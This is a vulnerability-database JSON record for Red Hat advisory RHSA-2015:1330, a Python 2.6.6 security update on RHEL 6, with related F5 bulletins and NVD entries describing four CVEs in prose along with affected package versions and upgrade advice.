{"id": "RHSA-2015:1330", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2015:1330) Moderate: python security, bug fix, and enhancement update", "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThese updated python packages also include numerous bug fixes and\nenhancements. Space precludes documenting all of these changes in this\nadvisory. For information on the most significant of these changes, users\nare directed to the following article on the Red Hat Customer Portal:\n\nhttps://access.redhat.com/articles/1495363\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add this\nenhancement.\n", "published": "2015-07-22T04:00:00", "modified": "2018-06-06T20:24:24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://access.redhat.com/errata/RHSA-2015:1330", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2013-1752", "CVE-2014-1912", "CVE-2014-4650", "CVE-2014-7185"], "lastseen": "2019-08-13T18:46:47", "viewCount": 8, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2019-08-13T18:46:47", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["F5:K93278412", "F5:K53192206", "F5:K78825687"]}, {"type": "cve", "idList": ["CVE-2014-7185", "CVE-2013-1752", "CVE-2014-1912", "CVE-2014-4650"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121364", "OPENVAS:1361412562310123066", "OPENVAS:1361412562310120425", "OPENVAS:1361412562310120611", "OPENVAS:1361412562310122760", "OPENVAS:1361412562310842261", "OPENVAS:1361412562310871404", "OPENVAS:1361412562310869288", "OPENVAS:1361412562310122870", "OPENVAS:1361412562310871501"]}, {"type": "centos", "idList": ["CESA-2015:2101", "CESA-2015:1330"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1330", "ELSA-2015-2101", "ELSA-2015-1064"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2015-075.NASL", "ORACLELINUX_ELSA-2015-1330.NASL", "ORACLEVM_OVMSA-2015-0098.NASL", "SUSE_SU-2015-1344-1.NASL", "UBUNTU_USN-2653-1.NASL", "ALA_ALAS-2014-440.NASL", "ALA_ALAS-2015-621.NASL", "SL_20150722_PYTHON_ON_SL6_X.NASL", "CENTOS_RHSA-2015-1330.NASL", "REDHAT-RHSA-2015-1330.NASL"]}, {"type": "amazon", "idList": ["ALAS-2015-621", "ALAS-2014-293", "ALAS-2014-440", "ALAS-2014-292"]}, {"type": "redhat", "idList": ["RHSA-2015:2101", "RHSA-2015:1064"]}, {"type": "ubuntu", "idList": ["USN-2125-1", "USN-2653-1"]}, {"type": "gentoo", "idList": ["GLSA-201503-10"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30347", "SECURITYVULNS:DOC:31253", "SECURITYVULNS:VULN:13594"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8E7AE717DB9D8AE0105415BFDE08CC6D", "EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D"]}, {"type": "exploitdb", "idList": ["EDB-ID:31875", "EDB-ID:33894"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:127241"]}, {"type": "seebug", "idList": ["SSV:61560", "SSV:85189"]}, {"type": "freebsd", "idList": ["8E5E6D42-A0FA-11E3-B09A-080027F2D077"]}, {"type": "zdt", "idList": ["1337DAY-ID-21938"]}], "modified": "2019-08-13T18:46:47", "rev": 2}, "vulnersScore": 7.1}, "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "tkinter", "packageVersion": "2.6.6-64.el6", "packageFilename": "tkinter-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "tkinter", "packageVersion": "2.6.6-64.el6", "packageFilename": "tkinter-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python-tools", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-tools-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python-test", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-test-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python-test", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-test-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python-test", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-test-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python-tools", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-tools-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python-devel", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-devel-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "tkinter", "packageVersion": "2.6.6-64.el6", "packageFilename": "tkinter-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "tkinter", "packageVersion": "2.6.6-64.el6", "packageFilename": "tkinter-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "s390x", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python-debuginfo", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-debuginfo-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc", "packageName": "python-libs", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-libs-2.6.6-64.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "x86_64", "packageName": "python-tools", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-tools-2.6.6-64.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "python-test", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-test-2.6.6-64.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "src", "packageName": "python", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-2.6.6-64.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "ppc64", "packageName": "python-tools", "packageVersion": "2.6.6-64.el6", "packageFilename": "python-tools-2.6.6-64.el6.ppc64.rpm", "operator": "lt"}]}

{"f5": [{"lastseen": "2017-07-22T00:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2014-1912", "CVE-2014-4650"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-07-21T22:49:00", "published": "2017-07-21T22:49:00", "href": "https://support.f5.com/csp/article/K93278412", "id": "F5:K93278412", "title": "Python and Jython vulnerabilities CVE-2014-1912 and CVE-2014-4650", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-27T20:24:30", "bulletinFamily": "software", "cvelist": ["CVE-2014-7185"], "description": "\nF5 Product Development has assigned IDs 537982 and 673541 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H78825687 on the **Diagnostics** &gt; **Identified** &gt; **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP AAM| 12.0.0 \n11.4.1 - 11.6.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP AFM| 12.0.0 \n11.4.1 - 11.6.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP Analytics| 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP APM| 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP ASM| 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP DNS| 12.0.0| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP Edge Gateway| 11.2.1| None| Medium| Python and Jython \nBIG-IP GTM| 11.4.1 - 11.6.1 \n11.2.1| None| Medium| Python and Jython \nBIG-IP Link Controller| 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP PEM| 12.0.0 \n11.4.1 - 11.6.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nBIG-IP PSM| 11.4.1| None| Medium| Python and Jython \nBIG-IP WebAccelerator| 11.2.1| None| Medium| Python and Jython \nBIG-IP WebSafe| 12.0.0 \n11.6.0 - 11.6.1| 13.0.0 \n12.1.0 - 12.1.2| Medium| Python and Jython \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, ensure Python and Jython scripts communicate only with trusted servers.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2017-07-27T20:12:00", "published": "2017-07-21T22:36:00", "href": "https://support.f5.com/csp/article/K78825687", "id": "F5:K78825687", "title": "Python and Jython vulnerability CVE-2014-7185", "type": "f5", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-04-06T22:39:33", "bulletinFamily": "software", "cvelist": ["CVE-2013-1752"], "description": "\nF5 Product Development has assigned IDs 537982 and 673537 (BIG-IP) and ID 672772 (Enterprise Manager) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H53192206 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP AAM | 12.0.0 \n11.4.1 - 11.6.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP AFM | 12.0.0 \n11.4.1 - 11.6.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP Analytics | 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP APM | 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP ASM | 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP DNS | 12.0.0 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Python and Jython \nBIG-IP GTM | 11.4.1 - 11.6.1 \n11.2.1 | None | Medium | Python and Jython \nBIG-IP Link Controller | 12.0.0 \n11.4.1 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP PEM | 12.0.0 \n11.4.1 - 11.6.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nBIG-IP PSM | 11.4.1 | None | Medium | Python and Jython \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Python and Jython \nBIG-IP WebSafe | 12.0.0 \n11.6.0 - 11.6.1 | 13.0.0 \n12.1.0 - 12.1.2 | Medium | Python and Jython \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Low | Python and Jython \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.2.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.2.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable1 | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, ensure Python and Jython scripts communicate only with trusted servers.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2019-07-19T20:14:00", "published": "2017-07-21T22:13:00", "id": "F5:K53192206", "href": "https://support.f5.com/csp/article/K53192206", "title": "Python and Jython vulnerability CVE-2013-1752", "type": "f5", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2020-10-03T12:01:21", "description": "Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a \"buffer\" function.", "edition": 4, "cvss3": {}, "published": "2014-10-08T17:55:00", "title": "CVE-2014-7185", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7185"], "modified": "2019-10-25T11:53:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:2.7.1150", "cpe:/a:python:python:2.7.2150", "cpe:/a:python:python:2.7.6", "cpe:/a:python:python:2.7.3", "cpe:/a:python:python:2.7.4", "cpe:/a:python:python:2.7.2", "cpe:/a:python:python:2.7.1", "cpe:/a:python:python:2.7.7"], "id": "CVE-2014-7185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7185", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:python:python:2.7.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.2150:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.1150:*:*:*:*:*:x64:*", "cpe:2.3:a:python:python:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:19", "description": "The CGIHTTPServer module in Python 2.7.5 and 3.3.4 does not properly handle URLs in which URL encoding is used for path separators, which allows remote attackers to read script source code or conduct directory traversal attacks and execute unintended code via a crafted character sequence, as demonstrated by a %2f separator.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-20T17:15:00", "title": "CVE-2014-4650", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4650"], "modified": "2020-02-26T13:49:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5.0", "cpe:/a:python:python:2.7.5", "cpe:/a:python:python:3.3.4", "cpe:/a:redhat:software_collections:-", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2014-4650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4650", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:python:python:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:software_collections:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:14", "description": "Buffer overflow in the socket.recvfrom_into function in Modules/socketmodule.c in Python 2.5 before 2.7.7, 3.x before 3.3.4, and 3.4.x before 3.4rc1 allows remote attackers to execute arbitrary code via a crafted string.", "edition": 4, "cvss3": {}, "published": "2014-03-01T00:55:00", "title": "CVE-2014-1912", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1912"], "modified": "2019-10-25T11:53:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.4", "cpe:/a:python:python:2.6.3", 